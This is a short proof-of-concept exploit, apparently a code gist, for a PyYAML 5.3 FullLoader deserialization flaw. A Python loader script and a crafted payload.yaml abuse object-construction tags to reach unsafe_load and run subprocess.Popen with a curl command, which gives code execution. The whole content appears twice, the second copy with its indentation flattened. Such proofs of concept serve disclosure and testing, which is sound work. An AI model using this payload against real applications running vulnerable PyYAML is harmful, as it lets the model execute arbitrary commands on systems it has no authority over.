adamczi/load.py

## load.py
# pyyaml==5.3 required. Vulnerability has been fixed in 5.3.1
# More: ret2libc's report in https://github.com/yaml/pyyaml/pull/386
# Explanation: https://2130706433.net/blog/pyyaml/
from yaml import *

with open('payload.yaml','rb') as f:
  content = f.read()

data = load(content, Loader=FullLoader) # Using vulnerable FullLoader

## payload.yaml
# The `extend` function is overriden to run `yaml.unsafe_load` with
# custom `listitems` argument, in this case a simple curl request

- !!python/object/new:yaml.MappingNode
  listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "http://127.0.0.1/rce"]]'
  state:
    tag: !!str dummy
    value: !!str dummy
    extend: !!python/name:yaml.unsafe_load
	# pyyaml==5.3 required. Vulnerability has been fixed in 5.3.1
	# More: ret2libc's report in https://github.com/yaml/pyyaml/pull/386
	# Explanation: https://2130706433.net/blog/pyyaml/
	from yaml import *

	with open('payload.yaml','rb') as f:
	content = f.read()

	data = load(content, Loader=FullLoader) # Using vulnerable FullLoader
	# The `extend` function is overriden to run `yaml.unsafe_load` with
	# custom `listitems` argument, in this case a simple curl request

	- !!python/object/new:yaml.MappingNode
	listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "http://127.0.0.1/rce"]]'
	state:
	tag: !!str dummy
	value: !!str dummy
	extend: !!python/name:yaml.unsafe_load